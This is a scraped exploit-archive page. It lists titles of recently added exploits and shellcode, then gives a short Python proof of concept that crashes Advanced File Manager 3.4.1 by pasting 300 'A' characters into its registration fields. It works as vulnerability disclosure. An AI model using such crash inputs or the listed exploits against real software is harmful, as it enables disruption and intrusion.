
8 changes to exploits/shellcodes Advanced File Manager 3.4.1 - Denial of Service (PoC) iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass) HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass) HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH) 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass) PDF Signer 3.0 - SSTI to RCE via CSRF Cookie PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie) Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
21 lines
No EOL
828 B
Python
Executable file
21 lines
No EOL
828 B
Python
Executable file
# Exploit Title: Advanced File Manager v3.4.1 - Denial of Service (PoC)
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2019-01-30
|
|
# Vendor Homepage: http://www.advexsoft.com
|
|
# Software Link : http://www.advexsoft.com
|
|
# Tested Version: 3.4.1
|
|
# Tested on: Windows XP SP3
|
|
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run af_mgr.exe
|
|
# 2.- copy content af_mgr_Crash.txt or 300 "A" to clipboard (result from this python script)
|
|
# 3.- Go to Help - Enter registration code and paste the result in all fields: "Person", "Organization", "E-mail" and "Enter your registration key below, please:"
|
|
# 4.- Click in Register button and you will see a crash.
|
|
|
|
#!/usr/bin/env python
|
|
|
|
crash = "\x41" * 300
|
|
f = open ("af_mgr_Crash.txt", "w")
|
|
f.write(crash)
|
|
f.close() |